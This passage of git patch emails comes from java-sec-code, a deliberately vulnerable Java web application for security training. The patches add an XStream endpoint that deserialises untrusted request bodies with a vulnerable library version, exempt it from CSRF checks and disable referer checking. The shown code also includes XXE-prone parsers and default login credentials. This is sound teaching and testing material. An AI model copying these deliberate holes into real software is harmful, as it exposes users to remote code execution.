         PathMatcher matcher = new AntPathMatcher();
         boolean isMatch = false;
-        for (String uri: referUris) {
+        for (String uri: WebConfig.getReferUris()) {
             if ( matcher.match (uri, request.getRequestURI()) ) {
                 isMatch = true;
                 break;
@@ -62,12 +50,12 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         }
 
         if (isMatch) {
-            if (referSecEnabled) {
+            if (WebConfig.getReferSecEnabled()) {
                 // Check referer for all GET requests with callback parameters.
-                for (String callback: callbacks) {
+                for (String callback: WebConfig.getCallbacks()) {
                     if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){
                         // If the check of referer fails, a 403 forbidden error page will be returned.
-                        if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
+                        if (!SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist())){
                             logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + refer);
                             response.sendRedirect("https://test.joychou.org/error3.html");
                             return;
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 1ed64577..05343a2e 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -6,7 +6,7 @@
 </head>
 <body>
     <p>Hello <span th:text="${user}"></span>.</p>
-    <p>Welcome to login java-sec-code application.</p>
+    <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
     <a th:href="@{/logout}">logout</a>
 </body>
 </html>
\ No newline at end of file

From a169c10a06aa60a82b9ac682c8eacfd21414c783 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 24 Jul 2019 11:57:27 +0800
Subject: [PATCH 050/108] update readme

---
 README.md | 42 ++++++++++++++++++++++--------------------
 1 file changed, 22 insertions(+), 20 deletions(-)

diff --git a/README.md b/README.md
index a742c047..5dba7ebd 100644
--- a/README.md
+++ b/README.md
@@ -11,26 +11,6 @@ This project can also be called Java vulnerability code.
 
 Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
 
-## Authenticate
-
-### Login
-
-[http://localhost:8080/login](http://localhost:8080/login)
-
-If you are not logged in, accessing any page will redirect you to the login page. The username & password are as follows.
-
-```
-admin/admin123
-joychou/joychou123
-```
-
-### Logout
-
-[http://localhost:8080/logout](http://localhost:8080/logout)
-
-### RememberMe
-
-Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-operational session will expire. In order to solve this problem, the rememberMe function is introduced, and the default expiration time is 2 weeks.
 
 ## Vulnerability Code
 
@@ -143,6 +123,28 @@ mvn clean package -DskipTests
 java -jar target/java-sec-code-1.0.0.jar
 ```
 
+## Authenticate
+
+### Login
+
+[http://localhost:8080/login](http://localhost:8080/login)
+
+If you are not logged in, accessing any page will redirect you to the login page. The username & password are as follows.
+
+```
+admin/admin123
+joychou/joychou123
+```
+
+### Logout
+
+[http://localhost:8080/logout](http://localhost:8080/logout)
+
+### RememberMe
+
+Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-operational session will expire. In order to solve this problem, the rememberMe function is introduced, and the default expiration time is 2 weeks.
+
+
 ## Contributors
 
 Core developers : [JoyChou](https://github.com/JoyChou93).

From a0e66f2526235eda92904c412d63a81ea5b7954b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 24 Jul 2019 13:23:50 +0800
Subject: [PATCH 051/108] update readme

---
 README.md    |  7 +++++--
 README_zh.md | 12 ++++++++----
 2 files changed, 13 insertions(+), 6 deletions(-)

diff --git a/README.md b/README.md
index 5dba7ebd..7e2d23f6 100644
--- a/README.md
+++ b/README.md
@@ -71,7 +71,8 @@ spring.datasource.password=woshishujukumima
 
 ### IDEA
 
-Click `run` button.
+- `git clone https://github.com/JoyChou93/java-sec-code`
+- Open in IDEA and click `run` button.
 
 Example:
 
@@ -87,7 +88,7 @@ Viarus
 
 ### Tomcat
 
-
+- `git clone https://github.com/JoyChou93/java-sec-code` & `cd java-sec-code`
 - Build war package by `mvn clean package`.
 - Copy war package to tomcat webapps directory.
 - Start tomcat application.
@@ -119,6 +120,8 @@ Change `war` to `jar` in `pom.xml`.
 Build package and run.
 
 ```
+git clone https://github.com/JoyChou93/java-sec-code
+cd java-sec-code
 mvn clean package -DskipTests 
 java -jar target/java-sec-code-1.0.0.jar
 ```
diff --git a/README_zh.md b/README_zh.md
index d43e473b..e24c360c 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -70,7 +70,8 @@ spring.datasource.password=woshishujukumima
 
 ### IDEA
 
-直接点击run按钮即可运行。
+- `git clone https://github.com/JoyChou93/java-sec-code`
+- 在IDEA中打开，直接点击run按钮即可运行。
 
 例子：
 
@@ -86,9 +87,10 @@ Viarus
 
 ### Tomcat
 
-1. 生成war包 `mvn clean package`。
-2. 将target目录的war包，cp到Tomcat的webapps目录。
-3. 重启Tomcat应用。
+1. `git clone https://github.com/JoyChou93/java-sec-code & cd java-sec-code`
+2. 生成war包 `mvn clean package`
+3. 将target目录的war包，cp到Tomcat的webapps目录
+4. 重启Tomcat应用
 
 
 例子：
@@ -119,6 +121,8 @@ Viarus
 再打包运行即可。
 
 ```
+git clone https://github.com/JoyChou93/java-sec-code
+cd java-sec-code
 mvn clean package -DskipTests 
 java -jar 打包后的jar包路径
 ```

From 467b74fc6f651633eae548ed06cc69c47058e197 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 29 Jul 2019 10:19:28 +0800
Subject: [PATCH 052/108] add docker env & add xtream rce vuln

---
 .gitignore                                    |  3 +
 README.md                                     | 17 ++++-
 README_zh.md                                  | 13 +++-
 docker-compose.yml                            | 13 ++++
 java-sec-code.iml                             |  6 +-
 pom.xml                                       |  7 ++
 .../org/joychou/controller/XStreamRce.java    | 43 ++++++++++++
 src/main/java/org/joychou/controller/XXE.java | 52 +++++----------
 .../org/joychou/controller/jsonp/JSONP.java   | 11 ++++
 .../security/CsrfAccessDeniedHandler.java     |  4 +-
 .../java/org/joychou/security/HttpFilter.java |  3 +-
 src/main/java/org/joychou/utils/Tools.java    | 29 +++++++++
 src/main/resources/application.properties     |  6 +-
 .../resources/static/js/jquery-1.11.1.min.js  |  4 --
 src/main/resources/templates/form.html        | 11 +++-
 src/main/resources/templates/login.html       | 65 +++++++++++++------
 16 files changed, 217 insertions(+), 70 deletions(-)
 create mode 100644 docker-compose.yml
 create mode 100644 src/main/java/org/joychou/controller/XStreamRce.java
 create mode 100644 src/main/java/org/joychou/utils/Tools.java
 delete mode 100644 src/main/resources/static/js/jquery-1.11.1.min.js

diff --git a/.gitignore b/.gitignore
index d83c1fbc..80d202f5 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,4 +2,7 @@
 .DS_Store
 target/
 other-vuls/
+docker/
+poc/
+src/main/java/org/joychou/test/
 *.iml
\ No newline at end of file
diff --git a/README.md b/README.md
index 7e2d23f6..be72a1b3 100644
--- a/README.md
+++ b/README.md
@@ -56,7 +56,7 @@ Sort by letter.
 
 ## How to run
 
-The application will use mybatis auto-injection. Please run mysql server ahead of time and configure the mysql server database's name and username/password.
+The application will use mybatis auto-injection. Please run mysql server ahead of time and configure the mysql server database's name and username/password except docker environment.
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -64,10 +64,25 @@ spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 ```
 
+- Docker
 - IDEA
 - Tomcat
 - JAR
 
+### Docker
+
+
+
+``` 
+docker-compose up
+```
+
+Docker's environment:
+
+- Java 1.8.0_102
+- Mysql 8.0.17
+- Tomcat 8.5.11
+
 
 ### IDEA
 
diff --git a/README_zh.md b/README_zh.md
index e24c360c..b2185b95 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -54,7 +54,7 @@
 
 ## 如何运行
 
-应用会用到mybatis自动注入，请提前运行mysql服务，并且配置mysql服务的数据库名称和用户名密码。
+应用会用到mybatis自动注入，请提前运行mysql服务，并且配置mysql服务的数据库名称和用户名密码(除非是Docker环境)。
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -62,11 +62,22 @@ spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 ```
 
+- Docker
 - IDEA
 - Tomcat
 - JAR
 
+### Docker
 
+``` 
+docker-compose up
+```
+
+Docker环境：
+
+- Java 1.8.0_102
+- Mysql 8.0.17
+- Tomcat 8.5.11
 
 ### IDEA
 
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 00000000..eb74348b
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,13 @@
+version : '2'
+services:
+    jsc:
+        image: joychou/jsc:1.0
+        ports:
+            - "8080:8080"
+        links:
+            - j_mysql
+
+    j_mysql:
+        image: joychou/jsc_mysql:1.0
+        ports:
+            - "3306:3306"
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 0278f6c0..1f7ef7b5 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -155,9 +155,6 @@
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-statistics:0.1.1" level="project" />
     <orderEntry type="library" name="Maven: io.reactivex:rxjava:1.1.10" level="project" />
     <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-eureka:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.9" level="project" />
-    <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
-    <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.uuid:java-uuid-generator:3.1.4" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.security:spring-security-web:4.2.12.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: aopalliance:aopalliance:1.0" level="project" />
@@ -181,5 +178,8 @@
     <orderEntry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
     <orderEntry type="library" name="Maven: org.apache.velocity:velocity:1.7" level="project" />
+    <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.10" level="project" />
+    <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
+    <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 1ea2f0f2..953440ec 100644
--- a/pom.xml
+++ b/pom.xml
@@ -189,6 +189,13 @@
             <version>1.7</version>
         </dependency>
 
+        <!-- rce -->
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+            <version>1.4.10</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
new file mode 100644
index 00000000..cbcb7a2b
--- /dev/null
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -0,0 +1,43 @@
+package org.joychou.controller;
+
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.xml.DomDriver;
+import org.joychou.dao.User;
+import org.joychou.utils.Tools;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+
+
+@RestController
+public class XStreamRce {
+
+    /**
+     * Fix method: update xstream to 1.4.11
+     * Xstream affected version: 1.4.10 or <= 1.4.6
+     * Set Content-Type: application/xml
+     *
+     * @author JoyChou @2019-07-26
+     */
+    @PostMapping("/xstream")
+    public String parseXml(HttpServletRequest request) throws Exception{
+        String xml = Tools.getBody(request);
+        XStream xstream = new XStream(new DomDriver());
+        xstream.fromXML(xml);
+        return "xstream";
+    }
+
+    public static void main(String[] args) throws Exception {
+        User user = new User();
+        user.setId(0);
+        user.setUsername("admin");
+
+        XStream xstream = new XStream(new DomDriver());
+        String xml = xstream.toXML(user); // Serialize
+        System.out.println(xml);
+
+        user = (User)xstream.fromXML(xml); // Deserialize
+        System.out.println(user.getId() + ": " + user.getUsername() );
+    }
+}
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 46d0ba39..445f8ef8 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -12,6 +12,7 @@
 import org.xml.sax.XMLReader;
 import java.io.*;
 import org.xml.sax.InputSource;
+
 import javax.xml.parsers.DocumentBuilder;
 import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.SAXParserFactory;
@@ -19,7 +20,7 @@
 import org.xml.sax.helpers.DefaultHandler;
 import org.apache.commons.digester3.Digester;
 import org.jdom2.input.SAXBuilder;
-
+import org.joychou.utils.Tools;
 
 /**
  * Java xxe vul and safe code.
@@ -33,9 +34,9 @@ public class XXE {
 
     @RequestMapping(value = "/xmlReader", method = RequestMethod.POST)
     @ResponseBody
-    public  String xxe_xmlReader(HttpServletRequest request) {
+    public String xxe_xmlReader(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
             xmlReader.parse( new InputSource(new StringReader(xml_con)) );  // parse xml
@@ -51,7 +52,7 @@ public  String xxe_xmlReader(HttpServletRequest request) {
     @ResponseBody
     public  String xxe_xmlReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
@@ -74,7 +75,7 @@ public  String xxe_xmlReader_fix(HttpServletRequest request) {
     @ResponseBody
     public  String xxe_SAXBuilder(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -90,7 +91,7 @@ public  String xxe_SAXBuilder(HttpServletRequest request) {
     @ResponseBody
     public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -109,7 +110,7 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
     @ResponseBody
     public  String xxe_SAXReader(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -126,7 +127,7 @@ public  String xxe_SAXReader(HttpServletRequest request) {
     @ResponseBody
     public  String xxe_SAXReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -146,7 +147,7 @@ public  String xxe_SAXReader_fix(HttpServletRequest request) {
     @ResponseBody
     public String xxe_SAXParser(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -165,7 +166,7 @@ public String xxe_SAXParser(HttpServletRequest request) {
     @ResponseBody
     public String xxe_SAXParser_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -186,7 +187,7 @@ public String xxe_SAXParser_fix(HttpServletRequest request) {
     @ResponseBody
     public String xxe_Digester(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -203,7 +204,7 @@ public String xxe_Digester(HttpServletRequest request) {
     @ResponseBody
     public String xxe_Digester_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -225,7 +226,7 @@ public String xxe_Digester_fix(HttpServletRequest request) {
     @ResponseBody
     public String xxeDocumentBuilderReturn(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -259,7 +260,7 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
     @ResponseBody
     public String DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -296,7 +297,7 @@ public String DocumentBuilder(HttpServletRequest request) {
     @ResponseBody
     public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -321,7 +322,7 @@ public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
     @ResponseBody
     public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -358,7 +359,7 @@ public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
     @ResponseBody
     public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = getBody(request);
+            String xml_con = Tools.getBody(request);
             System.out.println(xml_con);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 
@@ -393,22 +394,5 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
         }
     }
 
-    // 获取body数据
-    private String getBody(HttpServletRequest request) throws IOException {
-        InputStream in = request.getInputStream();
-        BufferedReader br = new BufferedReader(new InputStreamReader(in));
-        StringBuffer sb = new StringBuffer("");
-        String temp;
-        while ((temp = br.readLine()) != null) {
-            sb.append(temp);
-        }
-        if (in != null) {
-            in.close();
-        }
-        if (br != null) {
-            br.close();
-        }
-        return sb.toString();
-    }
 
 }
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 131d9bb3..89b77fd6 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -4,6 +4,7 @@
 import com.alibaba.fastjson.JSONObject;
 import org.joychou.security.SecurityUtil;
 import org.springframework.http.MediaType;
+import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
@@ -96,5 +97,15 @@ private String safecode(HttpServletRequest request) {
     }
 
 
+    /**
+     * http://localhost:8080/jsonp/getToken
+     * @return token {"token":"115329a7-3a85-4c31-9c02-02fa1bd1fdf8","parameterName":"_csrf","headerName":"X-XSRF-TOKEN"}
+     *
+     */
+    @RequestMapping("/getToken")
+    public CsrfToken csrf(CsrfToken token) {
+        return token;
+    }
+
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index 8471ea0c..ba9c3f7f 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -25,7 +25,9 @@ public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
     public void handle(HttpServletRequest request, HttpServletResponse response,
                        AccessDeniedException accessDeniedException) throws IOException, ServletException {
 
-        logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + request.getHeader("referer"));
+        logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" +
+                "Referer: " + request.getHeader("referer"));
+
         response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
         response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
         response.getWriter().write("CSRF check failed by JoyChou.");  // response contents
diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/security/HttpFilter.java
index a49816ed..2d6354e7 100644
--- a/src/main/java/org/joychou/security/HttpFilter.java
+++ b/src/main/java/org/joychou/security/HttpFilter.java
@@ -56,7 +56,8 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
                     if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){
                         // If the check of referer fails, a 403 forbidden error page will be returned.
                         if (!SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist())){
-                            logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + refer);
+                            logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
+                                    + "Referer: " + refer);
                             response.sendRedirect("https://test.joychou.org/error3.html");
                             return;
                         }
diff --git a/src/main/java/org/joychou/utils/Tools.java b/src/main/java/org/joychou/utils/Tools.java
new file mode 100644
index 00000000..f7b427cd
--- /dev/null
+++ b/src/main/java/org/joychou/utils/Tools.java
@@ -0,0 +1,29 @@
+package org.joychou.utils;
+
+import javax.servlet.http.HttpServletRequest;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+
+public class Tools {
+
+    // get body
+    public static String getBody(HttpServletRequest request) throws IOException {
+        InputStream in = request.getInputStream();
+        BufferedReader br = new BufferedReader(new InputStreamReader(in));
+        StringBuffer sb = new StringBuffer("");
+        String temp;
+        while ((temp = br.readLine()) != null) {
+            sb.append(temp);
+        }
+        if (in != null) {
+            in.close();
+        }
+        if (br != null) {
+            br.close();
+        }
+        return sb.toString();
+    }
+
+}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 8ba9a9b3..c37fbdc6 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,5 +1,5 @@
 
-spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&useSSL=false&serverTimezone=GMT%2B8
+spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&AllowPublicKeyRetrieval=True&useSSL=false&serverTimezone=GMT%2B8
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
@@ -13,7 +13,7 @@ management.security.enabled=false
 
 
 ### check referer configuration begins ###
-joychou.security.referer.enabled = true
+joychou.security.referer.enabled = false
 joychou.security.referer.hostwhitelist = joychou.org, joychou.com
 # Only support ant url style.
 joychou.security.referer.uri = /jsonp/**
@@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/**
 # csrf token check
 joychou.security.csrf.enabled = true
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /login/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###
diff --git a/src/main/resources/static/js/jquery-1.11.1.min.js b/src/main/resources/static/js/jquery-1.11.1.min.js
deleted file mode 100644
index 88a5832a..00000000
--- a/src/main/resources/static/js/jquery-1.11.1.min.js
+++ /dev/null
@@ -1,4 +0,0 @@
-/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
-!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||m.guid++,e):void 0},now:function(){return+new Date},support:k}),m.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function r(a){var b=a.length,c=m.type(a);return"function"===c||m.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var s=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new 